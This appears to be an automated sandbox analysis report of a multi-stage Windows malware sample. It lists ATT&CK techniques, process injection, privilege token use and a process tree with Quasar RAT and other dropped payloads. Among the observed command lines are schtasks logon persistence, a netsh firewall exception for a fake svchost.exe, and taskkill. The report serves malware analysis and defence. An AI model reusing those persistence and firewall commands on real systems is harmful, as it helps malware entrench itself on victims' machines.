Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
6488	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133818714868148392"	chrome.exe

Modifies registry class 7 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe

Runs ping.exe 1 TTPs 42 IoCs

Remote System Discovery

T1018

pid	Process
3280	PING.EXE
4100	PING.EXE
2328	PING.EXE
5552	PING.EXE
6992	PING.EXE
440	PING.EXE
5276	PING.EXE
6748	PING.EXE
1244	PING.EXE
2816	PING.EXE
3416	PING.EXE
3888	PING.EXE
2036	PING.EXE
4628	PING.EXE
3268	PING.EXE
1164	PING.EXE
5460	PING.EXE
1444	PING.EXE
3912	PING.EXE
7028	PING.EXE
6276	PING.EXE
3728	PING.EXE
4736	PING.EXE
2692	PING.EXE
4636	PING.EXE
5052	PING.EXE
1820	PING.EXE
2816	PING.EXE
3416	PING.EXE
5944	PING.EXE
6136	PING.EXE
2300	PING.EXE
6652	PING.EXE
6416	PING.EXE
2800	PING.EXE
6824	PING.EXE
6340	PING.EXE
696	PING.EXE
4652	PING.EXE
6052	PING.EXE
7004	PING.EXE
2756	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2296	schtasks.exe
3788	schtasks.exe
1108	schtasks.exe
2300	schtasks.exe
2800	schtasks.exe
2296	schtasks.exe
5168	schtasks.exe
2056	schtasks.exe
1376	schtasks.exe
2964	schtasks.exe
1300	schtasks.exe
4716	schtasks.exe
4736	schtasks.exe
4712	schtasks.exe
1028	schtasks.exe
6988	schtasks.exe
6492	schtasks.exe
2848	schtasks.exe
3536	schtasks.exe
4384	schtasks.exe
2024	schtasks.exe
752	schtasks.exe
1528	schtasks.exe
5700	schtasks.exe
1552	schtasks.exe
6868	schtasks.exe
3104	schtasks.exe
1632	schtasks.exe
4292	schtasks.exe
2560	schtasks.exe
5804	schtasks.exe
1500	schtasks.exe
1164	schtasks.exe
3424	schtasks.exe
724	schtasks.exe
2476	schtasks.exe
5344	schtasks.exe
2672	schtasks.exe
3268	schtasks.exe
2036	schtasks.exe
5488	schtasks.exe
400	schtasks.exe
4120	schtasks.exe
2476	schtasks.exe
5252	schtasks.exe
2532	schtasks.exe
6348	schtasks.exe
5844	schtasks.exe
5912	schtasks.exe
2420	schtasks.exe
5696	schtasks.exe
2800	schtasks.exe
464	schtasks.exe
1064	schtasks.exe
608	schtasks.exe
3288	schtasks.exe
2040	schtasks.exe
1040	schtasks.exe
6292	schtasks.exe
6896	schtasks.exe
5800	schtasks.exe
220	schtasks.exe
5132	schtasks.exe
2760	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
8	EXCEL.EXE
2200	notepad.exe
6828	notepad.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
228	5Swt0w3tF0.exe
2496	SppExtComObj.exe
2496	SppExtComObj.exe
2496	SppExtComObj.exe
2496	SppExtComObj.exe
2496	SppExtComObj.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

pid	Process
2496	SppExtComObj.exe
5940	server.exe
5568	svchost.exe
4272	jgesfyhjsefa.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
3924	python.exe
3924	python.exe
6204	python.exe
6204	python.exe
6540	python.exe
6540	python.exe
572	python.exe
572	python.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5028	._cache_4363463463464363463463463.exe
Token: SeDebugPrivilege	4336	._cache_Synaptics.exe
Token: SeDebugPrivilege	228	5Swt0w3tF0.exe
Token: SeDebugPrivilege	2164	l7Npnlscrd.exe
Token: SeDebugPrivilege	3160	Creal.exe
Token: SeDebugPrivilege	3764	Client.exe
Token: SeDebugPrivilege	2496	SppExtComObj.exe
Token: SeDebugPrivilege	488	Client.exe
Token: SeDebugPrivilege	2044	Client.exe
Token: SeDebugPrivilege	2000	Client.exe
Token: SeDebugPrivilege	2412	Client.exe
Token: SeDebugPrivilege	3804	Client-built.exe
Token: SeDebugPrivilege	3092	Runtime broker.exe
Token: SeDebugPrivilege	5060	Client.exe
Token: SeDebugPrivilege	4904	SGVP%20Client%20Users.exe
Token: SeDebugPrivilege	4272	jgesfyhjsefa.exe
Token: SeDebugPrivilege	1144	server.exe
Token: SeDebugPrivilege	860	Client.exe
Token: SeDebugPrivilege	3776	server.exe
Token: SeDebugPrivilege	5052	server.exe
Token: SeDebugPrivilege	2016	server.exe
Token: SeDebugPrivilege	1836	server.exe
Token: SeDebugPrivilege	2284	server.exe
Token: SeDebugPrivilege	3188	server.exe
Token: SeDebugPrivilege	4128	Client.exe
Token: SeDebugPrivilege	4696	server.exe
Token: SeDebugPrivilege	1996	server.exe
Token: SeDebugPrivilege	1836	server.exe
Token: SeDebugPrivilege	4980	Client.exe
Token: SeDebugPrivilege	2484	server.exe
Token: SeDebugPrivilege	3468	server.exe
Token: SeDebugPrivilege	1676	server.exe
Token: SeDebugPrivilege	1820	Client.exe
Token: SeDebugPrivilege	3584	server.exe
Token: SeDebugPrivilege	1696	server.exe
Token: SeDebugPrivilege	3980	server.exe
Token: SeDebugPrivilege	2308	Client.exe
Token: SeDebugPrivilege	3740	server.exe
Token: SeDebugPrivilege	2756	server.exe
Token: SeDebugPrivilege	4832	server.exe
Token: SeDebugPrivilege	1112	Client.exe
Token: SeDebugPrivilege	944	server.exe
Token: SeDebugPrivilege	828	server.exe
Token: SeDebugPrivilege	3372	server.exe
Token: SeDebugPrivilege	5012	Client.exe
Token: SeDebugPrivilege	832	server.exe
Token: SeDebugPrivilege	4264	server.exe
Token: SeDebugPrivilege	1980	server.exe
Token: SeDebugPrivilege	2936	Client.exe
Token: SeDebugPrivilege	4972	server.exe
Token: SeDebugPrivilege	4460	server.exe
Token: SeDebugPrivilege	4016	server.exe
Token: SeDebugPrivilege	3784	Client.exe
Token: SeDebugPrivilege	4264	server.exe
Token: SeDebugPrivilege	2672	Taskmgr.exe
Token: SeSystemProfilePrivilege	2672	Taskmgr.exe
Token: SeCreateGlobalPrivilege	2672	Taskmgr.exe
Token: SeDebugPrivilege	5940	server.exe
Token: SeDebugPrivilege	5452	server.exe
Token: SeDebugPrivilege	5568	svchost.exe
Token: SeDebugPrivilege	6240	notepad.exe
Token: SeDebugPrivilege	6488	taskkill.exe
Token: SeDebugPrivilege	2116	Client.exe
Token: SeDebugPrivilege	2200	notepad.exe

Suspicious use of FindShellTrayWindow 43 IoCs

pid	Process
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
2672	Taskmgr.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe

Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
8	EXCEL.EXE
8	EXCEL.EXE
8	EXCEL.EXE
8	EXCEL.EXE
8	EXCEL.EXE
8	EXCEL.EXE
8	EXCEL.EXE
8	EXCEL.EXE
4272	jgesfyhjsefa.exe
6240	notepad.exe
2200	notepad.exe
6828	notepad.exe
5908	Client.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2708 wrote to memory of 5028	2708	4363463463464363463463463.exe	77
PID 2708 wrote to memory of 5028	2708	4363463463464363463463463.exe	77
PID 2708 wrote to memory of 5028	2708	4363463463464363463463463.exe	77
PID 2708 wrote to memory of 2092	2708	4363463463464363463463463.exe	79
PID 2708 wrote to memory of 2092	2708	4363463463464363463463463.exe	79
PID 2708 wrote to memory of 2092	2708	4363463463464363463463463.exe	79
PID 2092 wrote to memory of 4336	2092	Synaptics.exe	80
PID 2092 wrote to memory of 4336	2092	Synaptics.exe	80
PID 2092 wrote to memory of 4336	2092	Synaptics.exe	80
PID 4336 wrote to memory of 3160	4336	._cache_Synaptics.exe	84
PID 4336 wrote to memory of 3160	4336	._cache_Synaptics.exe	84
PID 4336 wrote to memory of 3160	4336	._cache_Synaptics.exe	84
PID 5028 wrote to memory of 1448	5028	._cache_4363463463464363463463463.exe	85
PID 5028 wrote to memory of 1448	5028	._cache_4363463463464363463463463.exe	85
PID 5028 wrote to memory of 1448	5028	._cache_4363463463464363463463463.exe	85
PID 1448 wrote to memory of 3828	1448	javaw.exe	86
PID 1448 wrote to memory of 3828	1448	javaw.exe	86
PID 1448 wrote to memory of 3828	1448	javaw.exe	86
PID 1448 wrote to memory of 3828	1448	javaw.exe	86
PID 1448 wrote to memory of 3828	1448	javaw.exe	86
PID 1448 wrote to memory of 3828	1448	javaw.exe	86
PID 1448 wrote to memory of 3828	1448	javaw.exe	86
PID 1448 wrote to memory of 3828	1448	javaw.exe	86
PID 1448 wrote to memory of 3828	1448	javaw.exe	86
PID 1448 wrote to memory of 3828	1448	javaw.exe	86
PID 1448 wrote to memory of 4780	1448	javaw.exe	87
PID 1448 wrote to memory of 4780	1448	javaw.exe	87
PID 1448 wrote to memory of 4780	1448	javaw.exe	87
PID 1448 wrote to memory of 828	1448	javaw.exe	88
PID 1448 wrote to memory of 828	1448	javaw.exe	88
PID 1448 wrote to memory of 828	1448	javaw.exe	88
PID 1448 wrote to memory of 860	1448	javaw.exe	126
PID 1448 wrote to memory of 860	1448	javaw.exe	126
PID 1448 wrote to memory of 860	1448	javaw.exe	126
PID 1448 wrote to memory of 576	1448	javaw.exe	90
PID 1448 wrote to memory of 576	1448	javaw.exe	90
PID 1448 wrote to memory of 576	1448	javaw.exe	90
PID 1448 wrote to memory of 576	1448	javaw.exe	90
PID 1448 wrote to memory of 576	1448	javaw.exe	90
PID 1448 wrote to memory of 576	1448	javaw.exe	90
PID 1448 wrote to memory of 576	1448	javaw.exe	90
PID 1448 wrote to memory of 576	1448	javaw.exe	90
PID 1448 wrote to memory of 576	1448	javaw.exe	90
PID 1448 wrote to memory of 576	1448	javaw.exe	90
PID 5028 wrote to memory of 4860	5028	._cache_4363463463464363463463463.exe	92
PID 5028 wrote to memory of 4860	5028	._cache_4363463463464363463463463.exe	92
PID 5028 wrote to memory of 4860	5028	._cache_4363463463464363463463463.exe	92
PID 3828 wrote to memory of 232	3828	javaw.exe	95
PID 3828 wrote to memory of 232	3828	javaw.exe	95
PID 3828 wrote to memory of 228	3828	javaw.exe	97
PID 3828 wrote to memory of 228	3828	javaw.exe	97
PID 576 wrote to memory of 2488	576	javaw.exe	145
PID 576 wrote to memory of 2488	576	javaw.exe	145
PID 576 wrote to memory of 2164	576	javaw.exe	99
PID 576 wrote to memory of 2164	576	javaw.exe	99
PID 4860 wrote to memory of 4304	4860	crypted_c360a5b7.exe	101
PID 4860 wrote to memory of 4304	4860	crypted_c360a5b7.exe	101
PID 4860 wrote to memory of 4304	4860	crypted_c360a5b7.exe	101
PID 4860 wrote to memory of 4304	4860	crypted_c360a5b7.exe	101
PID 4860 wrote to memory of 4304	4860	crypted_c360a5b7.exe	101
PID 4860 wrote to memory of 4304	4860	crypted_c360a5b7.exe	101
PID 4860 wrote to memory of 4304	4860	crypted_c360a5b7.exe	101
PID 4860 wrote to memory of 4304	4860	crypted_c360a5b7.exe	101
PID 4860 wrote to memory of 4304	4860	crypted_c360a5b7.exe	101

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5772	attrib.exe
6880	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3332
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - Quasar RAT
  - Adds Run key to start application
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5028
  - - C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1448
    - - C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3828
      - C:\Users\Admin\AppData\Roaming\3YiUWvKbI3.exe
        
        "C:\Users\Admin\AppData\Roaming\3YiUWvKbI3.exe"
        6⤵
        Executes dropped EXE
        
        PID:232
      - C:\Users\Admin\AppData\Roaming\5Swt0w3tF0.exe
        
        "C:\Users\Admin\AppData\Roaming\5Swt0w3tF0.exe"
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:228
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nljsvoyc\nljsvoyc.cmdline"
        7⤵
        Drops file in System32 directory
        
        PID:572
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F42.tmp" "c:\Windows\System32\CSC228A886F73A744D185B3D3C6748658D.TMP"
        8⤵
        
        PID:404
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dmEvChObw5.bat"
        7⤵
        
        PID:860
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:3560
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3280
        
        C:\Recovery\WindowsRE\SppExtComObj.exe
        
        "C:\Recovery\WindowsRE\SppExtComObj.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2496
    - - C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe"
        5⤵
        Executes dropped EXE
        
        PID:4780
    - - C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe"
        5⤵
        Executes dropped EXE
        
        PID:828
    - - C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe"
        5⤵
        Executes dropped EXE
        
        PID:860
    - - C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:576
      - C:\Users\Admin\AppData\Roaming\5R0FyqxTzg.exe
        
        "C:\Users\Admin\AppData\Roaming\5R0FyqxTzg.exe"
        6⤵
        Executes dropped EXE
        
        PID:2488
      - C:\Users\Admin\AppData\Roaming\l7Npnlscrd.exe
        
        "C:\Users\Admin\AppData\Roaming\l7Npnlscrd.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2164
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1448 -s 860
        5⤵
        Program crash
        
        PID:3740
  - - C:\Users\Admin\AppData\Local\Temp\Files\crypted_c360a5b7.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\crypted_c360a5b7.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:4860
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:4304
  - - C:\Users\Admin\AppData\Local\Temp\Files\billi_e58d74e455634dc695ed8a7b8b320325.exe.upx.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\billi_e58d74e455634dc695ed8a7b8b320325.exe.upx.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2108
  - - C:\Users\Admin\AppData\Local\Temp\Files\payload.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\payload.exe"
      4⤵
      Executes dropped EXE
      PID:3820
  - - C:\Users\Admin\AppData\Local\Temp\Files\windows.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\windows.exe"
      4⤵
      PID:2312
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\windows\run.bat" /verysilent"
        5⤵
        
        PID:5808
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Roaming\windows\run.bat" min
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5836
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K b.bat
        7⤵
        
        PID:5832
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\windows\b.bat"
        8⤵
        
        PID:1112
        
        C:\Users\Admin\AppData\Roaming\windows\python.exe
        
        python.exe aa.py
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Loads dropped DLL
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:3924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c pip install cryptography
        10⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Roaming\windows\python.exe
        
        python.exe ab.py
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Loads dropped DLL
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:6204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c pip install cryptography
        10⤵
        
        PID:6220
        
        C:\Users\Admin\AppData\Roaming\windows\python.exe
        
        python.exe ac.py
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Loads dropped DLL
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:6540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c pip install cryptography
        10⤵
        
        PID:6660
        
        C:\Users\Admin\AppData\Roaming\windows\python.exe
        
        python.exe ad.py
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Loads dropped DLL
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:572
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K startup.bat
        7⤵
        
        PID:4768
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c startup.bat min
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5460
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\CreateShortcut.vbs
        9⤵
        Drops startup file
        
        PID:5884
  - - C:\Users\Admin\AppData\Local\Temp\Files\lastest.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\lastest.exe"
      4⤵
      PID:3192
    - - C:\Users\Admin\AppData\Roaming\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        5⤵
        Drops startup file
        Adds Run key to start application
        Drops autorun.inf file
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:5568
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:6476
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM ApplicationFrameHost.exe
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6488
  - - C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
      4⤵
      PID:3368
    - - C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
        5⤵
        Loads dropped DLL
        
        PID:6456
  - - C:\Users\Admin\AppData\Local\Temp\Files\anne.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\anne.exe"
      4⤵
      PID:684
  - - C:\Users\Admin\AppData\Local\Temp\Files\vovdawdrg.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\vovdawdrg.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5164
- - C:\ProgramData\Synaptics\Synaptics.exe
    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2092
  - - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4336
    - - C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3160
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2056
      - C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3764
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lbDG7KDv9CJL.bat" "
        7⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2000
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1244
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:488
        
